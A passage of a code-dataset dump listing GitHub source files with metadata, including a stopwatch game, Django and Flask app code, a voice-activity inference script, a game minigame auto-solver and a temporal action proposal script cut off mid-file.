blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1b0fbd3a1009f3e5e95136c8781c33d46618f6f8 | 758d629b162ce31efd239c8343395feb45db438f | /stop_watch.py | 0334396276e50b0e780c142ed03897de80709734 | [] | no_license | petarnenov/PEbyPython | 77df0fe1f48bef09b4b127c2df746e6c2b8b0076 | dff76a7ece342a29cc357ec33442e8f04bd9bb24 | refs/heads/master | 2021-05-30T07:56:42.839136 | 2015-04-04T04:12:13 | 2015-04-04T04:12:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | # "Stopwatch: The Game"
import simplegui
# define helper function format that converts time
# in tenths of seconds into formatted string A:BC.D
def init():
global stop_watch,counter_hits,counter_success,stop_watch_state
stop_watch=0
counter_hits=0
counter_success=0
stop_watch_state=False
def increase_counter_hits():
global counter_hits,stop_watch_state
if stop_watch_state:
counter_hits +=1
def check_success():
global stop_watch,counter_success,stop_watch_state
if stop_watch_state:
if stop_watch%10==0:
counter_success +=1
def set_stop_watch_state(state):
global stop_watch_state
stop_watch_state=state
def format_stop_watch(t):
min=t/600
min_to_str=str(min)
seconds=(t-min*600)/10
if seconds<10:
seconds_to_str="0"+str(seconds)
else:
seconds_to_str=str(seconds)
milseconds=t%10
milseconds_to_str=str(milseconds)
return min_to_str+":"+seconds_to_str+"."+milseconds_to_str
def format_counters():
global counter_hits,counter_success
return str(counter_success)+"/"+str(counter_hits)
# define event handlers for buttons; "Start", "Stop", "Reset"
def start():
timer.start()
set_stop_watch_state(True)
def stop():
timer.stop()
increase_counter_hits()
check_success()
set_stop_watch_state(False)
def reset():
timer.stop()
init()
# define event handler for timer with 0.1 sec interval
def tick():
global stop_watch
stop_watch +=1
# define draw handler
def draw(canvas):
canvas.draw_text(format_counters(),[162,20],20,"Green")
canvas.draw_text(format_stop_watch(stop_watch),[70,60],24,"Red")
# create frame
frame=simplegui.create_frame("Stop watch game",200,110)
button_start=frame.add_button("Start",start,100)
button_stop=frame.add_button("Stop",stop,100)
button_reset=frame.add_button("Reset",reset,100)
timer=simplegui.create_timer(100,tick)
# register event handlers
frame.set_draw_handler(draw)
# start frame
init()
frame.start()
# Please remember to review the grading rubric
| [
"petar_nenov@abv.bg"
] | petar_nenov@abv.bg |
ab61a06660830526e12cff1c81ea5d0ccabe1aab | 0babfca86d457fa95921f3bb97447f7cca24bdc1 | /.ipynb_checkpoints/run-checkpoint.py | 81325960df6cfdb19b87cd4a4a84b93fa9ce4e58 | [
"MIT"
] | permissive | karthikmaiya33/Data-Science-Salary-Estimator | 1e743d3bb6cf3557f60aef7c827a809664e291a2 | b78b5498d2e3326799cae445ba47d6e6a5637ccb | refs/heads/master | 2023-04-04T16:39:48.850095 | 2021-04-05T17:58:03 | 2021-04-05T17:58:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | # %%
import glassdoor_scraper as gs
import pandas as pd
path = "C:/Users/Vivan/Documents/GitHub/ds-salary-proj/drivers/geckodriver"
df = gs.get_jobs("data scientist", 25, False, path, 15)
# df
#%%
df.to_csv("glassdoor_jobs.csv", index=False)
# %%
df
# %%
| [
"vivanvatsa@gmail.com"
] | vivanvatsa@gmail.com |
b4ba19ff9baca2b971bcc38f2968ddfe582b80e0 | 847bc1b142723661a107f65f820b42708b242c70 | /djangonautic/views.py | f93335f77731aa8dfb03b830313413d566c54769 | [] | no_license | pedr0diniz/djangonautic | 906c8758a282f91f9bf6664371ce85baf24e1762 | f80875dbcb0102e91b194dc678f2c1626b069253 | refs/heads/master | 2023-04-01T22:39:01.054318 | 2021-03-03T18:41:18 | 2021-03-03T18:41:18 | 343,262,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | from django.http import HttpResponse # allows us to send a response to the user
from django.shortcuts import render
def homepage(request):
return render(request, 'homepage.html')
#return HttpResponse('homepage')
def about(request):
return render(request, 'about.html')
# return HttpResponse('about')
| [
"pgdneto@gmail.com"
] | pgdneto@gmail.com |
0db936d1dce687e4006b7d13f39800d18f076367 | dca480a5ac3e75ee77d65458e38367008051ed72 | /inference.py | 2107dbce32c034e5f4de7ae3f08c8d87bd4f92de | [] | no_license | psykana/tf_vad | 56a51130a06a8d279b25e0d01b13801c5eae2a1d | b35f11f2a01ec7554194acdd4d6d354d972775b7 | refs/heads/main | 2023-08-11T10:28:11.974281 | 2021-09-17T11:46:55 | 2021-09-17T11:46:55 | 394,674,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,071 | py | import os
import time
start_time = time.time()
import keras.backend as K
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from scipy.signal.windows import hann
from matplotlib.widgets import Slider
import config
from processing.data_utils import WAV
def custom_f1(y_true, y_pred):
def recall_m(y_true, y_pred):
TP = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
Positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = TP / (Positives + K.epsilon())
return recall
def precision_m(y_true, y_pred):
TP = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
Pred_Positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = TP / (Pred_Positives + K.epsilon())
return precision
precision, recall = precision_m(y_true, y_pred), recall_m(y_true, y_pred)
return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
wavList = [f for f in os.listdir(config.INFERENCE_DIR) if f.endswith('.WAV')]
if len(wavList) < 1:
raise ValueError('No WAVs found')
wavList = sorted(wavList)
# with tf.keras.utils.custom_object_scope({'Precision': tf.keras.metrics.Precision(), 'Recall': tf.keras.metrics.Recall()}):
model = tf.keras.models.load_model(config.INF_MODEL, custom_objects={'custom_f1': custom_f1})
print("Init: --- %s seconds ---" % (time.time() - start_time))
try:
os.remove('predictions.txt')
except OSError:
pass
window = hann(config.FRAMESIZE)
for file in wavList:
start_time = time.time()
print(file + ": ", end="")
wav = WAV(config.INFERENCE_DIR, file)
labels = wav.getLabels()
predictions = np.zeros(wav.frameNum, dtype='float32')
while wav.curFrame < wav.frameNum - 1:
frame, label = wav.getNextFrame()
frame = np.multiply(frame, window)
psd = wav.getPsd(frame)
psd = psd.reshape((1, config.TENSOR_SHAPE))
predictions[wav.curFrame] = model(psd)
print("--- %s seconds ---" % (time.time() - start_time))
fig, ax = plt.subplots()
wav_norm = wav.data * 1.0 / (max(abs(wav.data)))
t = np.arange(0, wav.frameNum * config.OVERLAP, config.OVERLAP)
line3, = plt.plot(wav_norm)
line2, = plt.plot(labels, label="Labels")
line1, = plt.plot(t, predictions, label="Predictions")
plt.subplots_adjust(bottom=0.2)
sliderax = plt.axes([0.25, 0.1, 0.65, 0.03])
rounding_slider = Slider(
ax=sliderax,
label='Rounding threshold',
valmin=0.0,
valmax=1.0,
valinit=config.ROUNDING_THRESHOLD
)
def update(val):
length = len(predictions)
res = np.zeros(length)
for i in range(length):
if predictions[i] > val:
res[i] = 1
else:
res[i] = 0
line1.set_ydata(res)
fig.canvas.draw_idle()
update(config.ROUNDING_THRESHOLD)
rounding_slider.on_changed(update)
plt.legend()
plt.show()
with open("predictions.txt", 'a') as out:
np.savetxt(out, predictions, fmt='%.4e', encoding='bytes')
| [
"syrota.nick@gmail.com"
] | syrota.nick@gmail.com |
5049a6a17bb6f5f1cf7716b310e81afec4673c3a | adf4bcb21f389d7f23404a4f7c20a5715cb010df | /artists/migrations/0005_artist_artist_page_font_color.py | 16aba8f19c4df19533f3841e9e9fad26f89f66a3 | [] | no_license | alvarantson/HAPE | d88baf7d6659ae373ad29741f3ecab7f140bb18b | bda85a1bc3a0b4a1d411eafc443b0ceca9c5ef49 | refs/heads/master | 2022-12-17T01:54:09.576680 | 2020-09-21T17:30:09 | 2020-09-21T17:30:09 | 278,030,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | # Generated by Django 3.0.2 on 2020-08-26 11:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('artists', '0004_auto_20200825_2333'),
]
operations = [
migrations.AddField(
model_name='artist',
name='artist_page_font_color',
field=models.CharField(blank=True, max_length=999),
),
]
| [
"47379716+alvarantson@users.noreply.github.com"
] | 47379716+alvarantson@users.noreply.github.com |
4d17bd3c2268c982aa3f90aaefede2f97b901519 | 09920189ad54d79388f8fab4392cc38ad91fc7c8 | /national_medicine/machine_learning_model/__init__.py | 62c0d4781c62b4d441b7c9b2aa773683411d8431 | [] | no_license | marjeylee/dm | d783fba4ac6e6386cd70a4b48abb5e3752d4261d | 20d533be2703c20723f551f7c86627acec09b937 | refs/heads/master | 2020-03-16T17:23:25.313114 | 2018-12-18T23:33:56 | 2018-12-18T23:33:56 | 132,830,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | # -*- coding: utf-8 -*-
"""
机器学习模块合集
"""
__author__ = 'l'
__date__ = '2018/5/10'
| [
"rui_li@lingrit.com"
] | rui_li@lingrit.com |
0343ec26152adc51e7a2367bc11e3b8901b2b165 | 8b8a0417297da6d9b58a4e05ecee08b2f1cdb845 | /healthDemo/docBot/urls.py | b237986771adf88724a0356a4196281a742c197c | [] | no_license | shravan097/healthHack2018 | d5b37cf2d29fec55446b41459cc4693f0832ce55 | a2b6eb27067dd987dae5efeb1ebde66aeafe3ff2 | refs/heads/master | 2020-03-10T22:38:24.793283 | 2018-04-26T01:54:44 | 2018-04-26T01:54:44 | 129,623,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from django.conf.urls import url,include
from django.contrib import admin
from . import views
urlpatterns = [
url(r'^$', views.index,name="index"),
url(r'results', views.result, name='post_detail')
] | [
"noreply@github.com"
] | shravan097.noreply@github.com |
5247e05fedc3b4010c1fd05918da47a596108f5a | 0b480b28455d4ea133eaeec5625e2ce62660dbb1 | /populate_rango.py | c872d3fa71f07dc547fc08034fa6175d00d97eca | [] | no_license | jtr109/tango_with_django_exercise | 8ff6c05321be8ca614a550abc6c66aef55886136 | ce2aa7c5a12eae0352b435dc726bef4e378ef3c5 | refs/heads/master | 2020-09-22T09:28:34.217081 | 2016-08-30T02:49:35 | 2016-08-30T02:49:35 | 66,900,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,374 | py | import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django_project.settings')
import django
django.setup()
from rango.models import Category, Page
def populate():
python_cat = add_cat(name='Python',
views=128, likes=64)
add_page(cat=python_cat,
title="Official Python Tutorial",
url="http://docs.python.org/2/tutorial/",
views=16)
add_page(cat=python_cat,
title="How to Think like a Computer Scientist",
url="http://www.greenteapress.com/thinkpython/",
views=32)
add_page(cat=python_cat,
title="Learn Python in 10 Minutes",
url="http://www.korokithakis.net/tutorials/python/",
views=64)
django_cat = add_cat(name="Django",
views=64, likes=32)
add_page(cat=django_cat,
title="Official Django Tutorial",
url="https://docs.djangoproject.com/en/1.5/intro/tutorial01/",
views=128)
add_page(cat=django_cat,
title="Django Rocks",
url="http://www.djangorocks.com/",
views=256)
add_page(cat=django_cat,
title="How to Tango with Django",
url="http://www.tangowithdjango.com/",
views=512)
frame_cat = add_cat(name="Other Frameworks",
views=32, likes=16)
add_page(cat=frame_cat,
title="Bottle",
url="http://bottlepy.org/docs/dev/",
views=400)
add_page(cat=frame_cat,
title="Flask",
url="http://flask.pocoo.org",
views=300)
# Print out what we have added to the user.
for c in Category.objects.all():
for p in Page.objects.filter(category=c):
print "- {0} - {1}".format(str(c), str(p))
def add_page(cat, title, url, views=0):
p = Page.objects.get_or_create(category=cat, title=title)[0]
p.url = url
p.views = views
p.save()
return p
def add_cat(name, views, likes):
# The get_or_create() method returns a tuple of (object, created).
c = Category.objects.get_or_create(name=name)[0]
c.views = views
c.likes = likes
c.save()
return c
# Start execution here!
if __name__ == '__main__':
print "Starting Rango population script..."
populate()
| [
"lyp_login@outlook.com"
] | lyp_login@outlook.com |
99e5c847fcbd96b1d211ba2139ee3718155f9c78 | d7823583b53c54107c9d263bc839b7096fa8ef32 | /hacks/cayovoltage.py | 850700a8392565412aca085639247c900944ecda | [] | no_license | josemaripl/Lester-Ver2.0 | efabf1f98646a2e0bd238c412af1aa9a35de019a | 2d6823c94c962d1c41f05591c67d2bd99a48c5c2 | refs/heads/main | 2023-04-19T15:01:02.779278 | 2021-05-06T14:35:51 | 2021-05-06T14:35:51 | 368,948,132 | 1 | 0 | null | 2021-05-19T17:22:43 | 2021-05-19T17:22:43 | null | UTF-8 | Python | false | false | 4,309 | py | import cv2
import time
import keyboard
import numpy as np
from PIL import ImageGrab
DIGITS_LOOKUP = {
(1, 1, 1, 0, 1, 1, 1): 0,
(0, 0, 1, 0, 0, 1, 0): 1,
(1, 0, 1, 1, 1, 0, 1): 2,
(1, 0, 1, 1, 0, 1, 1): 3,
(0, 1, 1, 1, 0, 1, 0): 4,
(1, 1, 0, 1, 0, 1, 1): 5,
(1, 1, 0, 1, 1, 1, 1): 6,
(1, 0, 1, 0, 0, 1, 0): 7,
(1, 1, 1, 1, 1, 1, 1): 8,
(1, 1, 1, 1, 0, 1, 1): 9
}
RIGHT_SYMBOLS = {
(0, 1): 10,
(1, 0): 2,
(0, 0): 1
}
moves = {
(0, 0, 1, 1, 2, 2): ['enter', 'return', 'enter', 'return', 'enter', 'return'], # (1-1) + (2-2) + (3-3)
(0, 0, 1, 2, 2, 1): ['enter', 'return', 'enter', 's', 'return', 'enter', 'return'], # (1-1) + (2-3) + (3-2)
(0, 1, 1, 0, 2, 2): ['enter', 's', 'return', 'enter', 'w', 'return', 'enter', 'return'], #(1-2) + (2-1) + (3-3)
(0, 1, 1, 2, 2, 0): ['enter', 's', 'return', 'enter', 'return', 'enter', 'return'], # (1-2) + (2-3) + (3-1)
(0, 2, 1, 0, 2, 1): ['enter', 'w', 'return', 'enter', 'w', 'return', 'enter', 'return'], # (1-3) + (2-1) + (3-2)
(0, 2, 1, 1, 2, 0): ['enter', 'w', 'return', 'enter', 'return', 'enter', 'return'] # (1-3) + (2-2) + (3-1)
}
bbox = (0, 0, 1920, 1080)
# objective numbers
objectivenumber_height = [123, 137, 137, 154, 173, 173, 195] #objective numbers have same height
objectivenumber_length_0 = [865, 849, 881, 865, 849, 881, 865] # first number
objectivenumber_length_1 = [955, 939, 971, 955, 939, 971, 955] # second number
objectivenumber_length_2 = [1043, 1029, 1061, 1043, 1029, 1061, 1043] # third number
# left numbers
leftnumber_length = [509, 495, 527, 509, 495, 527, 509] # left nubmers have same length
leftnumber_height_0 = [271, 287, 287, 303, 323, 323, 343] # first number
leftnumber_height_1 = [507, 522, 522, 540, 557, 557, 579] # second number
leftnumber_height_2 = [741, 755, 755, 773, 791, 791, 813] # third number
# right symbols
rightsymbol_length = [1351, 1349] # right symbols have same length
rightsymbol_height_0 = [305, 277] # first symbol
rightsymbol_height_1 = [541, 513] # second symbol
rightsymbol_height_2 = [775, 747] # third symbol
def pixel_check(x, y, img, maximum, dictionary):
hints = []
for i in range(0, maximum):
pixel = img[y[i]:y[i] + 1, x[i]:x[i] + 1]
if np.mean(pixel):
hints.append(1)
else:
hints.append(0)
return dictionary[tuple(hints)]
def objective_number(img):
value = (100 * (pixel_check(objectivenumber_length_0, objectivenumber_height, img, 7, DIGITS_LOOKUP))) + (10 * (pixel_check(objectivenumber_length_1, objectivenumber_height, img, 7, DIGITS_LOOKUP))) + pixel_check(objectivenumber_length_2, objectivenumber_height, img, 7, DIGITS_LOOKUP)
return value
def left_numbers(img):
values = []
values.append(pixel_check(leftnumber_length, leftnumber_height_0, img, 7, DIGITS_LOOKUP))
values.append(pixel_check(leftnumber_length, leftnumber_height_1, img, 7, DIGITS_LOOKUP))
values.append(pixel_check(leftnumber_length, leftnumber_height_2, img, 7, DIGITS_LOOKUP))
return values
def right_symbols(img):
values = []
values.append(pixel_check(rightsymbol_length, rightsymbol_height_0, img, 2, RIGHT_SYMBOLS))
values.append(pixel_check(rightsymbol_length, rightsymbol_height_1, img, 2, RIGHT_SYMBOLS))
values.append(pixel_check(rightsymbol_length, rightsymbol_height_2, img, 2, RIGHT_SYMBOLS))
return values
def calculate(a, b, c):
try:
for i in range(0, 6):
keys = []
keys.append(list(tuple(moves)[i]))
for z, x, v, n, k, l in keys:
if (a == b[z] * c[x] + b[v] * c[n] + b[k] * c[l]):
print('-', moves[tuple(moves)[i]])
for key in (moves[tuple(moves)[i]]):
keyboard.press_and_release(key)
if key == 's' or 'w' or 'enter':
time.sleep(0.025)
if key == 'return':
time.sleep(1.3)
raise NotImplementedError
except:
print('[*] END')
print('=============================================')
def main():
print('[*] Cayo Voltage Hack')
im = ImageGrab.grab(bbox)
grayImage = cv2.cvtColor(np.array(im), cv2.COLOR_RGB2GRAY)
(thresh, blackAndWhiteImage) = cv2.threshold(grayImage, 127, 255, cv2.THRESH_BINARY)
objectivenumber = objective_number(blackAndWhiteImage)
leftnumbers = left_numbers(blackAndWhiteImage)
rightnumbers = right_symbols(blackAndWhiteImage)
print('- ', objectivenumber, leftnumbers, rightnumbers)
calculate(objectivenumber, leftnumbers, rightnumbers) | [
"justdie4444@gmail.com"
] | justdie4444@gmail.com |
671babfdcd9d0db83cd8f3f3e94374bf22d6aab6 | e1ea7fd17b9c57669e36f3723e3f4cb8a7aa8b8d | /test/test_issue14.py | 1dbf440837a8b68f44962283f75f45f630dcc9a6 | [
"BSD-2-Clause"
] | permissive | WeiLiPenguin/sphinxcontrib-bibtex | 356a9e079cc140045d15ad18a304fcaf666201be | f849cfb1a5572a2fd0085a53773c7f46fc6670bf | refs/heads/master | 2021-01-24T15:42:20.195865 | 2015-03-20T10:48:03 | 2015-03-20T10:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py | # -*- coding: utf-8 -*-
"""
test_issue14
~~~~~~~~~~~~
Test duplicate label issue.
"""
from six import StringIO
import os.path
import re
from util import path, with_app
srcdir = path(__file__).parent.joinpath('issue14').abspath()
warnfile = StringIO()
def teardown_module():
(srcdir / '_build').rmtree(True)
@with_app(srcdir=srcdir, warning=warnfile)
def test_duplicate_label(app):
app.builder.build_all()
warnings = warnfile.getvalue()
assert re.search(
'duplicate label for keys (Test and Test2)|(Test2 and Test)',
warnings)
with open(os.path.join(app.outdir, "doc1.html")) as stream:
assert re.search('<td class="label">\\[1\\]</td>', stream.read())
with open(os.path.join(app.outdir, "doc2.html")) as stream:
assert re.search('<td class="label">\\[1\\]</td>', stream.read())
| [
"matthias.troffaes@gmail.com"
] | matthias.troffaes@gmail.com |
56f3fb8d8c2a525ec1c01c4950f1ea526b738f2a | ce739b5837947fc66efa6f618e361e4bdeb0efed | /CST_Testbad.py | fc6f5453c21863a807b7e38631e5aa7665506dbd | [] | no_license | Gitnameisname/DL-RED_CST | 2e91768da880f7de06ba7e07ac5afcc13310abcc | 61be2f36e085892b6a745ef1a20b49c7bb4124a0 | refs/heads/main | 2023-07-03T21:13:40.924171 | 2021-08-11T11:04:35 | 2021-08-11T11:04:35 | 394,959,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,975 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 28 19:56:47 2020
@author: CK_DL2
"""
import numpy as np
from sys import exc_info, stdout
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool
import CST_message as msg
import CST_Log as Log
import CST_writeDB as wDB
import CST_Rinput as Rin
import CST_AF
import CST_ReadDB as ReadDB
import CST_RunXfoil
import CST_Dataset as AFdataset
import CST_AF as AF
def check_thickness(wl, wu):
dz = 0.
N = 200
airfoil = AF.CST_shape(0.5, 1.0, wl, wu, dz, N)
coord = airfoil.airfoil_coor()
thick = []
airfoil2 = AF.CST_shape_preproc(0.5, 1.0, wl, wu, dz, N)
angle, decision = airfoil2.airfoil_coor()
j = 0
for j in range(99):
thick.append(coord[1][j+1]-coord[1][199-j])
thick_max = max(thick)
if thick_max > 0.03 and decision == 1:
# airfoil.plotting()
return thick_max
else:
return []
if __name__ == "__main__":
loop = 1
filename_Error = 'CST Error DB ' + str(loop) + '.txt'
filename_Answer = 'CST Answer DB ' + str(loop) + '.txt'
DB_Error = ReadDB.Read(filename_Error)
DB_Answer = ReadDB.Read(filename_Answer)
# ---------------------- Thickness Check -------------------------------- #
list_maxThickness = []
list_configDB_filtered = []
list_index = []
DB_config = DB_Answer[:,0:8]
no_proc = 10
no_proc_available = cpu_count()
if no_proc >= no_proc_available:
msg.debuginfo('Exceeded the number of available processors')
msg.debuginfo(str('User input: {}, Available: {}'.format(no_proc,no_proc_available)))
msg.debuginfo(str('Number of Process was changed: {} >> {}'.format(no_proc, no_proc-2)))
no_proc = no_proc_available - 2
DB_config_split = np.array_split(DB_config,no_proc)
i=0
# Get size values about splited configDB
size_configDB_split=[]
for i in range(no_proc):
size_configDB_split.append(np.shape(DB_config_split[i])[0])
if size_configDB_split[i] != size_configDB_split[i-1]:
last_max_DB = i
msg.debuginfo(str('Size of the splited config DB: {}'.format(size_configDB_split)))
max_iter = max(size_configDB_split)
"""
max_iter = 1은 테스트를 위한 라인입니다.
"""
# max_iter = 1
min_iter = min(size_configDB_split)
msg.debuginfo('====================')
line=0 # no_Airfoil at sepertated configuration DB
while line < max_iter:
if line > min_iter - 1:
no_proc = last_max_DB
progress=('Progress: '+str(line+1)+'/'+str(max_iter))
stdout.write('\r'+progress)
try:
# Make CST Airfoil
i=0
pool = ThreadPool(no_proc)
for i in range(no_proc):
wl = DB_config_split[i][line, :4]
wu = DB_config_split[i][line,4: ]
result = pool.apply_async(check_thickness, args = (wl, wu))
thick = result.get(timeout = 1)
if np.size(thick) > 0:
list_maxThickness.append(thick)
list_configDB_filtered.append(np.append(wl, wu))
pool.close()
pool.join()
line += 1
except Exception as e:
exc_type, exc_obj, exc_tb = exc_info()
message1 = msg.errorinfo(exc_type, exc_obj, exc_tb, e)
Log.log(message1)
message2 = str('Error Occured in progress: {}/{}'.format(line+1,max_iter))
msg.debuginfo(message2)
msg.debuginfo(progress)
line = max_iter | [
"noreply@github.com"
] | Gitnameisname.noreply@github.com |
8c9e35aae3ecb3d4de6bec9dbc8b68e2e4340921 | e62ae882d878e8e5ca55eda5588cbffcd1daba47 | /developments/migrations/0008_auto_20190411_1347.py | 54a1afcec3acb311dfb315e9b62b1d63951511d8 | [] | no_license | Fanksies/g_webapp | 1eb145ccef9782630934e1bad4aa300676faf696 | 6d67267294baa9569b547374d4d3a658a9b9719b | refs/heads/master | 2020-05-14T07:45:30.578665 | 2019-04-16T15:02:45 | 2019-04-16T15:02:45 | 181,712,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | # Generated by Django 2.0.13 on 2019-04-11 18:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('developments', '0007_auto_20190409_1338'),
]
operations = [
migrations.AlterField(
model_name='development',
name='description',
field=models.TextField(max_length=256, verbose_name='Resumen'),
),
]
| [
"seanbrucet@gmail.com"
] | seanbrucet@gmail.com |
1eaebea3291ff3c38e1228aeb7caff6408ed76ad | 7dff53e0f0943e9e331b62c6a2233c7fc8d9e62a | /Presentation_script.py | 78c3de1f810818fa2e8c6e55c60a6af9912ded21 | [
"MIT"
] | permissive | aaqib-ali/Flight_Delay-Prediction | b03f45946cc52472ce4ad453496b4d6260ae1444 | 6f849a60d0705d0f86beccf302e4953dafbee777 | refs/heads/master | 2023-02-23T17:50:37.100039 | 2021-01-28T21:54:18 | 2021-01-28T21:54:18 | 333,967,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import utils.helper_models as helper_models
from modelling import Modelling
from xgboost import plot_tree
#path = "E:\PlusDental_Task\presentation\Churn_Modelling.csv"
data_directory_path = "E:\PlusDental_Task\presentation"
features_target_csv_file_name = "Churn_Modelling.csv"
#data_raw = pd.read_csv(path)
#print(data_raw.shape)
# Checking missing values Just for confirmation
# data_check = helper_models.missing_values_table(data_raw)
# print('Missing values in a column with the percentage', data_check)
modelling = Modelling(data_directory_path, features_target_csv_file_name)
modelling.modelling(data_directory_path, features_target_csv_file_name)
| [
"aaqib_ali90@protonmail.com"
] | aaqib_ali90@protonmail.com |
bfa5b4a6470235a489f54741c7f0f9fe574cef1a | 1c0505803cf4ebe42bd1f6f369c949c35d7a4d5b | /ConceptZI/asgi.py | 24e3f6d0b87254642df1b96f867bea4629215e26 | [] | no_license | tahirs95/django_stripe_sepa | 37d6787e0e5cb9e88dea7a94c3edcb07902f6fc1 | 8ed597be78aee9f84569562d4cd187485f750cb4 | refs/heads/main | 2023-08-22T19:16:35.786920 | 2021-10-01T16:22:36 | 2021-10-01T16:22:36 | 412,537,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
ASGI config for ConceptZI project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ConceptZI.settings")
application = get_asgi_application()
| [
"tahirs95@hotmail.com"
] | tahirs95@hotmail.com |
82dcd6ebde92c82b4f4e2131c83a405ee56c8de8 | 5076b60ab70ff9de61115005d84c5f97153cdf8f | /articles/migrations/0002_articles_photo.py | 11fd57ffcfe9becf441c6ecc6425c5971a809796 | [] | no_license | bekzod886/blog | e08eb1066e6aae891150e1e58a4e87437da1fc47 | e993e3d648f6d87b63a656e1823ef8cf7141beae | refs/heads/main | 2023-07-10T23:01:20.459801 | 2021-08-19T03:40:58 | 2021-08-19T03:40:58 | 397,682,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # Generated by Django 3.2.5 on 2021-08-15 08:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='articles',
name='photo',
field=models.ImageField(blank=True, upload_to='images/'),
),
]
| [
"bekzodnasimov97@gmail.com"
] | bekzodnasimov97@gmail.com |
66075636f8497cb0544a0af3641a13ab9ff32ee1 | 533a4d3bb5bed5e73415330510311f85ed7426f1 | /config/config.py | c75d49a8cad71157b41c32ceab08a5121e58f45f | [
"MIT"
] | permissive | mrmuli/live-it | 94fac5b98424ae67533128403c7ae02115954339 | a943f7b067eb5d587dfa925c82d74f6cd7e209f9 | refs/heads/master | 2021-06-07T11:44:22.612782 | 2016-11-21T07:16:34 | 2016-11-21T07:16:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 969 | py | import os
# set project base directory
basedir = os.path.abspath(os.path.dirname(__file__))
class Config():
" default settings "
DEBUG = True
TESTING = True
SQLALCHEMY_DATABASE_URI = "sqlite:///" + \
os.path.join(basedir, "bucketlist.db")
ERROR_404_HELP = False
ERROR_400_HELP = False
class TestingConfig(object):
" testing configurations "
DEBUG = True
PRESERVE_CONTEXT_ON_EXCEPTION = False
TESTING = True
SQLALCHEMY_DATABASE_URI = "sqlite:///" + \
os.path.join(basedir, "test_bucketlist.db")
SQLALCHEMY_TRACK_MODIFICATIONS = True
class DevelopmentConfig(object):
" development configuration "
DEBUG = True
TESTING = True
SQLALCHEMY_DATABASE_URI = "sqlite:///" + \
os.path.join(basedir, "bucketlist.db")
SQLALCHEMY_TRACK_MODIFICATIONS = True
config_settings = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'SECRET_KEY': "k9we213@#21tjuw"
}
| [
"joseph.muli@andela.com"
] | joseph.muli@andela.com |
a3ed21e69362f1dd137934275f89850246547ba8 | 15441cbc962c7b2e43b7e854cc29be79cf2818df | /code/generate_sst_props.py | 8c3a7702dfdb3b932ace106961dff4c09000e057 | [] | no_license | lysh/sst | dc4b693c8793a39ae30e584b526a92962f600429 | 5e4d3f1e34824223a5f7a28cd5c40a8f0fba420e | refs/heads/master | 2021-07-15T05:22:01.744703 | 2017-10-20T16:37:37 | 2017-10-20T16:37:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,520 | py | """
generate_sst_props.py
---------------------
This is an example script to load pre-trained model parameters for SST and
obtain predictions on a set of videos. Note that this script is operating for
demo purposes on top of the visual encoder features for each time step in the
input videos.
"""
import argparse
import os
import hickle as hkl
import lasagne
import numpy as np
import pandas as pd
import theano
import theano.tensor as T
import scipy.io as sio
from sst.vis_encoder import VisualEncoderFeatures as VEFeats
from sst.model import SSTSequenceEncoder
from sst.utils import get_segments, nms_detections
def parse_args():
p = argparse.ArgumentParser(
description="SST example evaluation script",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('-nms', '--nms-thresh', default=0.7, type=float,
help='threshold for non-maximum suppression')
p.add_argument('-mp', '--model-params', help='filepath to model params file.',
default='../data/params/params_sl128_np32_d1_w256_fd500.hkl', type=str)
p.add_argument('-od', '--output-dir', default='../data/proposals/output',
help='folder filepath for output proposals', type=str)
p.add_argument('-d', '--dataset',
